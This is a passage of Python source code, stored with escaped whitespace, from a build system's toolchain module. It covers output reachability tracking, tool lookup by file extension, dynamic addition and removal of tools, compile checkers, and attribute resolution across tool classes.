tool: The tool context to enter\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t:returns: Context manager to be used with a 'with' statement\n\t\t\t\t\t\t:rtype: context manager\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn Use(tool)\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType))\n\t\t\t\t\tdef CreateReachability(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCreate reachability info for a tool as it's about to be used.\n\t\t\t\t\t\tThe tool does not 
have to actively be in the task queue, this should be called every time an input\n\t\t\t\t\t\tis assigned to a tool, whether it's being processed immediately or being marked as pending.\n\t\t\t\t\t\t:param tool: The tool to mark reachability for\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor output in tool.outputFiles:\n\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t_classTrackr.reachability[output] += 1\n\n\t\t\t\t\t\tfor otherTool in _classTrackr.paths[tool]:\n\t\t\t\t\t\t\tfor output in otherTool.outputFiles:\n\t\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t\t_classTrackr.reachability[output] += 1\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType))\n\t\t\t\t\tdef ReleaseReachability(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tReleases reachability info for a tool, marking one instance of the tool finished.\n\t\t\t\t\t\tNote that for group inputs, this should be released as many times as it was created (i.e., if every\n\t\t\t\t\t\tinput called CreateReachability, then it needs to also be released once per input)\n\t\t\t\t\t\t:param tool: The tool to release reachability for\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor output in tool.outputFiles:\n\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t_classTrackr.reachability[output] -= 1\n\t\t\t\t\t\t\tassert _classTrackr.reachability[output] >= 0, \"Cannot release reachability without creating it\"\n\n\t\t\t\t\t\tfor otherTool in _classTrackr.paths[tool]:\n\t\t\t\t\t\t\tfor output in otherTool.outputFiles:\n\t\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t\t_classTrackr.reachability[output] -= 1\n\t\t\t\t\t\t\t\tassert _classTrackr.reachability[output] >= 0, \"Cannot release reachability without creating it\"\n\n\t\t\t\t\tdef HasAnyReachability(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck if any builds have started that didn't finish, if anything at all is reachable.\n\t\t\t\t\t\t:return: True if reachable, False otherwise\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor val in _classTrackr.reachability.values():\n\t\t\t\t\t\t\tif val != 0:\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\treturn False\n\n\t\t\t\t\t@TypeChecked(extension=String)\n\t\t\t\t\tdef IsOutputActive(self, extension):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck whether an output of the given extension is capable of being generated.\n\t\t\t\t\t\t:param extension:\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:return: Whether or not the input is active\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.reachability.get(extension, 0) != 0\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType), extension=String)\n\t\t\t\t\tdef CanCreateOutput(self, tool, extension):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck whether a tool is capable of ever creating a given output, even indirectly through other tools\n\t\t\t\t\t\t:param tool: The tool to check\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t:param extension: The extension to check\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:return: Whether or not the tool can create that output\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tif extension in tool.outputFiles:\n\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\tfor otherTool in _classTrackr.paths[tool]:\n\t\t\t\t\t\t\tif extension in otherTool.outputFiles:\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\treturn False\n\n\t\t\t\t\tdef 
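CreateReachability and ReleaseReachability above amount to reference counting per output extension, applied both to the tool's direct outputs and to every output on its precomputed downstream path. A bare-bones model of that counter, assuming the caller passes the already-merged extension set:

```python
# Bare-bones sketch of the reachability reference counting above,
# using a plain dict keyed by output extension.
reachability = {}

def create(extensions):
	for ext in extensions:
		reachability[ext] = reachability.get(ext, 0) + 1

def release(extensions):
	for ext in extensions:
		reachability[ext] -= 1
		assert reachability[ext] >= 0, "Cannot release reachability without creating it"

create({".o", ".a", ".exe"})             # a compile task is queued: downstream outputs become reachable
print(reachability.get(".exe", 0) != 0)  # True  -> IsOutputActive(".exe")
release({".o", ".a", ".exe"})            # the task finished
print(reachability.get(".exe", 0) != 0)  # False -> no pending work can still produce .exe
```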
GetAllTools(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the full list of tools in this toolchain\n\t\t\t\t\t\t:return: Tool list\n\t\t\t\t\t\t:rtype: ordered_set.OrderedSet\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.classes\n\n\t\t\t\t\tdef GetActiveTools(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the full list of active tools in this toolchain\n\t\t\t\t\t\t:return: Tool list\n\t\t\t\t\t\t:rtype: ordered_set.OrderedSet\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.activeClasses\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef DeactivateTool(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tRemove the specified tool from the active tool list. This is used internally when processing\n\t\t\t\t\t\tnull tools to ensure they don't get processed multiple times. You should NOT use this in a\n\t\t\t\t\t\tmakefile - instead, you should use RemoveTool\n\n\t\t\t\t\t\t:param tool: tool to remove\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\t_classTrackr.activeClasses.remove(tool)\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef IsToolActive(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tReturn whether or not the specified tool is active\n\n\t\t\t\t\t\t:param tool: tool to remove\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t:return: Whether or not the tool is active\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn tool in _classTrackr.activeClasses\n\n\t\t\t\t\t@TypeChecked(extension=(String, type(None)), generatingTools=(set, type(None)))\n\t\t\t\t\tdef GetToolsFor(self, extension, generatingTools=None):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet all tools that take a given input. If any generatingTools are specified, they will be excluded from the result.\n\n\t\t\t\t\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:param generatingTools: The tools that generated this input\n\t\t\t\t\t\t:type generatingTools: set[class] or None\n\t\t\t\t\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\t\t\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\t\t\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\t\t\t\t\tfor ALL of that tool's group inputs.\n\t\t\t\t\t\t:rtype: ordered_set.OrderedSet[type]\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tret = ordered_set.OrderedSet()\n\t\t\t\t\t\tfor cls in _classTrackr.activeClasses:\n\t\t\t\t\t\t\tif generatingTools and cls in generatingTools:\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tif extension is None and cls.inputFiles is None:\n\t\t\t\t\t\t\t\tif cls.exclusive:\n\t\t\t\t\t\t\t\t\treturn ordered_set.OrderedSet([cls])\n\t\t\t\t\t\t\t\tret.add(cls)\n\t\t\t\t\t\t\telif cls.inputFiles is not None and extension in cls.inputFiles:\n\t\t\t\t\t\t\t\tif cls.exclusive:\n\t\t\t\t\t\t\t\t\treturn ordered_set.OrderedSet([cls])\n\t\t\t\t\t\t\t\tret.add(cls)\n\n\t\t\t\t\t\treturn ret\n\n\t\t\t\t\t@TypeChecked(extension=String, generatingTools=(set, type(None)))\n\t\t\t\t\tdef GetGroupToolsFor(self, extension, generatingTools=None):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet all tools that take a given group input. 
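GetToolsFor is essentially extension-based dispatch with an early-out for exclusive tools. An illustrative sketch with hypothetical tool classes (CppCompiler, StaticAnalyzer, and SoleOwner are made up for the example):

```python
# Illustrative sketch of the extension-based dispatch in GetToolsFor.
class CppCompiler:
	inputFiles = {".cpp"}
	exclusive = False

class StaticAnalyzer:
	inputFiles = {".cpp", ".h"}
	exclusive = False

class SoleOwner:
	inputFiles = {".rc"}
	exclusive = True   # an exclusive match suppresses every other candidate

def tools_for(extension, classes, generating_tools=frozenset()):
	ret = []
	for cls in classes:
		if cls in generating_tools:
			continue
		if extension in cls.inputFiles:
			if cls.exclusive:
				return [cls]
			ret.append(cls)
	return ret

classes = [CppCompiler, StaticAnalyzer, SoleOwner]
print([c.__name__ for c in tools_for(".cpp", classes)])  # ['CppCompiler', 'StaticAnalyzer']
print([c.__name__ for c in tools_for(".rc", classes)])   # ['SoleOwner']
```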
If any generatingTools are specified, they will be excluded from the result.\n\n\t\t\t\t\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:param generatingTools: The tools that generated this input\n\t\t\t\t\t\t:type generatingTools: set[class] or None\n\t\t\t\t\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\t\t\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\t\t\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\t\t\t\t\tfor ALL of that tool's group inputs.\n\t\t\t\t\t\t:rtype: set[type]\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tret = ordered_set.OrderedSet()\n\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\tif generatingTools and cls in generatingTools:\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tfor dep in cls.dependencies:\n\t\t\t\t\t\t\t\tif self.IsOutputActive(dep):\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tif extension in cls.inputGroups:\n\t\t\t\t\t\t\t\tif cls.exclusive:\n\t\t\t\t\t\t\t\t\treturn ordered_set.OrderedSet([cls])\n\t\t\t\t\t\t\t\tret.add(cls)\n\n\t\t\t\t\t\treturn ret\n\n\t\t\t\t\t@TypeChecked(_return=set)\n\t\t\t\t\tdef GetSearchExtensions(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tReturn the full list of all extensions handled as inputs by any tool in the toolchain.\n\t\t\t\t\t\t:return: Set of all extensions\n\t\t\t\t\t\t:rtype: set[String]\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tret = set()\n\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\tif cls.inputFiles is not None:\n\t\t\t\t\t\t\t\tret |= cls.inputFiles\n\t\t\t\t\t\t\tret |= cls.inputGroups\n\t\t\t\t\t\treturn ret\n\n\n\t\t\t\t\tdef __setattr__(self, name, val):\n\t\t\t\t\t\tlastClass = _getLastClass()\n\t\t\t\t\t\tlimit = _getLimit()\n\t\t\t\t\t\tif not lastClass and len(limit) == 1:\n\t\t\t\t\t\t\tfor dummy in limit:\n\t\t\t\t\t\t\t\twith Use(dummy):\n\t\t\t\t\t\t\t\t\tsetattr(self, name, val)\n\t\t\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tassert lastClass is not None, \"Setting attributes is not supported on Toolchain instances. \" \\\n\t\t\t\t\t\t\t\"Use toolchain.Tool(FooTool) to limit to a single tool before setting attributes.\"\n\t\t\t\t\t\tif lastClass is self:\n\t\t\t\t\t\t\tobject.__setattr__(self, name, val)\n\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tcls = lastClass\n\n\t\t\t\t\t\t# Iterate all the base classes until we find one that's already set this value.\n\t\t\t\t\t\t# If we don't find one that's set this value, this value is being initialized and should\n\t\t\t\t\t\t# be placed within the scope of the class that's initializing it. 
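The __setattr__ logic that follows is what makes base-class state shared while derived-class state stays isolated: a write walks the mro and lands on the most-base class that already owns the name. A condensed model using plain dicts in place of classValues (breaking at object rather than the Tool base):

```python
# Condensed model of the classValues scoping in __setattr__: writes land on
# the most-base class that already defined the name, otherwise on the class
# currently initializing it.
class Base: pass
class Derived1(Base): pass
class Derived2(Base): pass

class_values = {Base: {}, Derived1: {}, Derived2: {}}

def scoped_set(active_cls, name, value):
	owner = active_cls
	for base in active_cls.mro():
		if base is object:
			break
		if name in class_values[base]:
			owner = base
	class_values[owner][name] = value

scoped_set(Base, "someval", 0)          # initialized by the base: shared
scoped_set(Derived1, "test", 1)         # initialized by each child: isolated
scoped_set(Derived2, "test", 2)
scoped_set(Derived2, "someval", 54321)  # write through a child still hits the base copy

print(class_values[Base]["someval"])                                    # 54321
print(class_values[Derived1]["test"], class_values[Derived2]["test"])   # 1 2
```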
That class and its children\n\t\t\t\t\t\t# will then be able to see it, but its bases and siblings (classes that share a common base)\n\t\t\t\t\t\t# will not.\n\t\t\t\t\t\tfor base in lastClass.mro():\n\t\t\t\t\t\t\tif base == ToolClass:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tif name in classValues[base]:\n\t\t\t\t\t\t\t\tcls = base\n\t\t\t\t\t\tclassValues[cls][name] = val\n\n\t\t\t\t\tdef Tool(self, *args):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tObtain a LimitView object that allows functions to be run only on specific tools\n\n\t\t\t\t\t\t:param args: List of classes to limit function execution on\n\t\t\t\t\t\t:type args: class\n\t\t\t\t\t\t:return: limit view object\n\t\t\t\t\t\t:rtype: LimitView\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn LimitView(self, *args)\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef AddTool(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tAdd a new tool to the toolchain. This can only be used by a toolchain initialized with\n\t\t\t\t\t\trunInit = False to add that tool to the static method resolution; a toolchain initialized\n\t\t\t\t\t\twith runInit = True is finalized and cannot have new tools added to it\n\n\t\t\t\t\t\t:param tool: Class inheriting from Tool\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tassert not runInit, \"AddTool can't be called from this context\"\n\t\t\t\t\t\tassert tool not in _classTrackr.classes, \"Tool {} has already been added\".format(tool)\n\n\t\t\t\t\t\tfrom .. import currentPlan\n\t\t\t\t\t\tcurrentPlan.AddToSet(\"tools\", tool)\n\n\t\t\t\t\t\tfor base in tool.mro():\n\t\t\t\t\t\t\tif base is tool:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\tif base is ToolClass:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t# Replace the base class's __init__ so we can track members properly\n\t\t\t\t\t\t\tif runInit:\n\t\t\t\t\t\t\t\t_setinit(base)\n\t\t\t\t\t\t\t_classTrackr.bases.add(base)\n\t\t\t\t\t\t\tclassValues.setdefault(base, {})\n\n\t\t\t\t\t\tclassValues[tool] = {}\n\n\t\t\t\t\t\t_classTrackr.classes.add(tool)\n\n\t\t\t\t\t\tif tool.supportedArchitectures is not None:\n\t\t\t\t\t\t\tshared_globals.allArchitectures.update(set(tool.supportedArchitectures))\n\n\t\t\t\t\t\tobject.__setattr__(self, \"__class__\", type(PlatformString(\"Toolchain\"), tuple(_classTrackr.classes), dict(ToolchainTemplate.__dict__)))\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef RemoveTool(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tRemoves a tool from the toolchain. This can be used in a makefile to remove tools within\n\t\t\t\t\t\tcertain contexts, such as on a specific platform, or to remove default tools, such as\n\t\t\t\t\t\tthe built-in C++ linker tools.\n\n\t\t\t\t\t\t:param tool: Class inheriting from Tool\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tassert not runInit, \"RemoveTool can't be called from this context\"\n\t\t\t\t\t\tassert tool in _classTrackr.classes, \"Tool {} has not been added\".format(tool)\n\n\t\t\t\t\t\tfrom .. 
import currentPlan\n\t\t\t\t\t\tcurrentPlan.AddToSet(\"disabledTools\", tool)\n\n\t\t\t\t\t\t_classTrackr.classes.remove(tool)\n\n\t\t\t\t\t\tobject.__setattr__(self, \"__class__\", type(PlatformString(\"Toolchain\"), tuple(_classTrackr.classes), dict(ToolchainTemplate.__dict__)))\n\n\n\t\t\t\t\t@TypeChecked(extension=String, checker=CompileChecker)\n\t\t\t\t\tdef AddChecker(self, extension, checker):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tAdd a compile checker for a given extension.\n\n\t\t\t\t\t\t:param extension: The extension this checker applies to\n\t\t\t\t\t\t:type extension: str\n\t\t\t\t\t\t:param checker: The CompileChecker instance to be used for files with this extension\n\t\t\t\t\t\t:type checker: CompileChecker\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tassert not runInit, \"AddChecker can't be called from this context\"\n\n\t\t\t\t\t\tfrom .. import currentPlan\n\t\t\t\t\t\tcurrentPlan.UpdateDict(\"checkers\", {extension: checker})\n\t\t\t\t\t\t_classTrackr.checkers[extension] = checker\n\n\t\t\t\t\t@TypeChecked(extension=String)\n\t\t\t\t\tdef GetChecker(self, extension):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the checker for a given extension. If none has been registered, returns a default CompileChecker instance\n\n\t\t\t\t\t\t:param extension: The extension to check\n\t\t\t\t\t\t:type extension: str\n\t\t\t\t\t\t:return: The checker to use\n\t\t\t\t\t\t:rtype: CompileChecker\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.checkers.get(extension, defaultChecker)\n\n\t\t\t\t\tdef __deepcopy__(self, memo):\n\t\t\t\t\t\tmemo[id(self)] = self\n\t\t\t\t\t\treturn self\n\n\t\t\t\t\tdef __getattribute__(self, name):\n\t\t\t\t\t\twith perf_timer.PerfTimer(\"Toolchain attribute resolution\"):\n\t\t\t\t\t\t\tif name[0] == \"$\":\n\t\t\t\t\t\t\t\tname = name[1:]\n\t\t\t\t\t\t\t\tfor cls in _classTrackr.classes | _classTrackr.bases:\n\t\t\t\t\t\t\t\t\tif cls.__name__ == name:\n\t\t\t\t\t\t\t\t\t\treturn self.Tool(cls)\n\t\t\t\t\t\t\t\traise AttributeError(\"The requested tool '{}' was not found in this toolchain.\".format(name))\n\n\t\t\t\t\t\t\tif hasattr(ToolchainTemplate, name):\n\t\t\t\t\t\t\t\t# Anything implemented in ToolchainTemplate has priority over things implemented elsewhere\n\t\t\t\t\t\t\t\t# Return these things as actions on the toolchain itself rather than on its tools.\n\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\n\t\t\t\t\t\t\tlastClass = _getLastClass()\n\t\t\t\t\t\t\tlimit = _getLimit()\n\t\t\t\t\t\t\tif len(limit) == 1 and shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t\t\t\t\t\tcls = list(limit)[0]\n\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\tsentinel = object()\n\t\t\t\t\t\t\t\t\tval = sentinel\n\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\tval = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\tif not isinstance(val, (types.FunctionType, types.MethodType, property)):\n\t\t\t\t\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\t\t\t\t\tif cls in shared_globals.allGeneratorTools:\n\t\t\t\t\t\t\t\t\t\t\t\tlimit.add(cls)\n\n\t\t\t\t\t\t\tif not lastClass and len(limit) == 1:\n\t\t\t\t\t\t\t\tfor dummy in limit:\n\t\t\t\t\t\t\t\t\twith Use(dummy):\n\t\t\t\t\t\t\t\t\t\treturn getattr(self, name)\n\n\t\t\t\t\t\t\tif lastClass:\n\t\t\t\t\t\t\t\t# If we only have one class to look at, we can shortcut a little bit.\n\t\t\t\t\t\t\t\t# Also we can give access to instance methods and instance data that we can't give access to 
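AddTool and RemoveTool both finish by rebuilding the instance's class with type(), since a runtime-computed tuple of bases is the Python 2-compatible substitute for class Toolchain(*classes). A minimal demonstration of that pattern with made-up tool classes:

```python
# Minimal model of the dynamic class (re)construction used by AddTool and
# RemoveTool above: type() accepts a runtime-computed tuple of bases.
class CompilerTool:
	def Compile(self): return "compiled"

class LinkerTool:
	def Link(self): return "linked"

bases = (CompilerTool,)
Toolchain = type(str("Toolchain"), bases, {})
tc = Toolchain()

# "Adding a tool" swaps the live instance onto a freshly built class:
bases = (CompilerTool, LinkerTool)
object.__setattr__(tc, "__class__", type(str("Toolchain"), bases, {}))
print(tc.Compile(), tc.Link())  # compiled linked
```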
with\n\t\t\t\t\t\t\t\t# multiple classes in view.\n\n\t\t\t\t\t\t\t\tif lastClass is self:\n\t\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\n\t\t\t\t\t\t\t\t# Iterate the class's mro looking for the first one that has this name present for it.\n\t\t\t\t\t\t\t\t# This starts with the class itself and then goes through its bases\n\t\t\t\t\t\t\t\tfor cls in lastClass.mro():\n\t\t\t\t\t\t\t\t\tif cls == ToolClass:\n\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\tif name in classValues[cls]:\n\t\t\t\t\t\t\t\t\t\treturn classValues[cls][name]\n\n\t\t\t\t\t\t\t\t# If we didn't find it there, then look for it on the class itself\n\t\t\t\t\t\t\t\t# This is either a function, method, or static variable, not an instance variable.\n\t\t\t\t\t\t\t\t# Would love to guarantee this is a function...\n\t\t\t\t\t\t\t\t# But for some reason python lets you access statics through self, so whatever...\n\t\t\t\t\t\t\t\tcls = lastClass\n\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\tsentinel = object()\n\t\t\t\t\t\t\t\t\tval = sentinel\n\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\tval = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\tassert val is not sentinel, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\tif isinstance(val, property):\n\t\t\t\t\t\t\t\t\t\t# pylint: disable=no-member\n\t\t\t\t\t\t\t\t\t\treturn val.__get__(self)\n\t\t\t\t\t\t\t\t\tif isinstance(val, (staticmethod, classmethod)):\n\t\t\t\t\t\t\t\t\t\t# pylint: disable=no-member\n\t\t\t\t\t\t\t\t\t\treturn val.__get__(cls)\n\t\t\t\t\t\t\t\t\tif isinstance(val, (types.FunctionType, types.MethodType)):\n\t\t\t\t\t\t\t\t\t\tassert runInit, \"Cannot call non-static methods of class {} from this context!\".format(cls.__name__)\n\t\t\t\t\t\t\t\t\t\treturn types.MethodType(val, self)\n\t\t\t\t\t\t\t\t\treturn val\n\n\t\t\t\t\t\t\t\tif hasattr(object, name) or hasattr(ToolClass, name):\n\t\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\t\t\t\t\t\t\t\traise AttributeError(\"'{}' object has no attribute '{}'\".format(cls.__name__, name))\n\n\t\t\t\t\t\t\t# For public variables we want to return a wrapper function that calls all\n\t\t\t\t\t\t\t# matching functions. This should definitely be a function. If it's not a function,\n\t\t\t\t\t\t\t# things will not work.\n\t\t\t\t\t\t\tdef _runMultiFunc(*args, **kwargs):\n\t\t\t\t\t\t\t\tfunctions = {}\n\n\t\t\t\t\t\t\t\t# Iterate through all classes and collect functions that match this name\n\t\t\t\t\t\t\t\t# We'll keep a list of all the functions that match, but only call each matching\n\t\t\t\t\t\t\t\t# function once. 
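The repeated "__dict__ instead of getattr()" comments are worth seeing in isolation: getattr() unwraps staticmethod/classmethod descriptors, so only a __dict__ lookup along the mro reveals how a method was declared. A tiny demonstration:

```python
# Why the code above inspects cls.__dict__ instead of using getattr():
# getattr() returns an already-unwrapped function, losing the
# staticmethod/classmethod wrapper the resolution logic needs to see.
class Demo:
	@staticmethod
	def Static(): pass
	def Instance(self): pass

print(type(getattr(Demo, "Static")))   # <class 'function'> -- wrapper is gone
print(type(Demo.__dict__["Static"]))   # <class 'staticmethod'> -- still detectable
print(isinstance(Demo.__dict__["Instance"], staticmethod))  # False
```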
And when we call it we'll use the most base class we find that\n\t\t\t\t\t\t\t\t# has it - which should be the one that defined it - and only call each one once\n\t\t\t\t\t\t\t\t# (so if there are two subclasses of a base that base's functions won't get called twice)\n\t\t\t\t\t\t\t\tif limit:\n\t\t\t\t\t\t\t\t\tclasses = limit\n\t\t\t\t\t\t\t\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t\t\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\t\t\t\t\tif cls in shared_globals.allGeneratorTools:\n\t\t\t\t\t\t\t\t\t\t\t\tclasses.add(cls)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tclasses = _classTrackr.classes\n\t\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\t\tfunc = None\n\t\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\t\tfunc = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\tassert func is not None, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\t\tif func not in functions or issubclass(functions[func], cls):\n\t\t\t\t\t\t\t\t\t\t\tfunctions[func] = cls\n\n\t\t\t\t\t\t\t\t# Having collected all functions, iterate and call them\n\t\t\t\t\t\t\t\tfor func, cls in functions.items():\n\t\t\t\t\t\t\t\t\twith Use(cls):\n\t\t\t\t\t\t\t\t\t\tfunc.__get__(cls)(*args, **kwargs)\n\n\t\t\t\t\t\t\thasNonFunc = False\n\t\t\t\t\t\t\tif limit:\n\t\t\t\t\t\t\t\tclasses = limit\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tclasses = _classTrackr.classes\n\t\t\t\t\t\t\tfound = False\n\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\tfunc = None\n\t\t\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\tfunc = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\tassert func is not None, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\tif isinstance(func, (types.FunctionType, types.MethodType, property)):\n\t\t\t\t\t\t\t\t\t\traise InvalidFunctionCall(\n\t\t\t\t\t\t\t\t\t\t\t\"Function call is invalid. '{}' is an instance method and is being called on a toolchain with more than one tool in its view. 
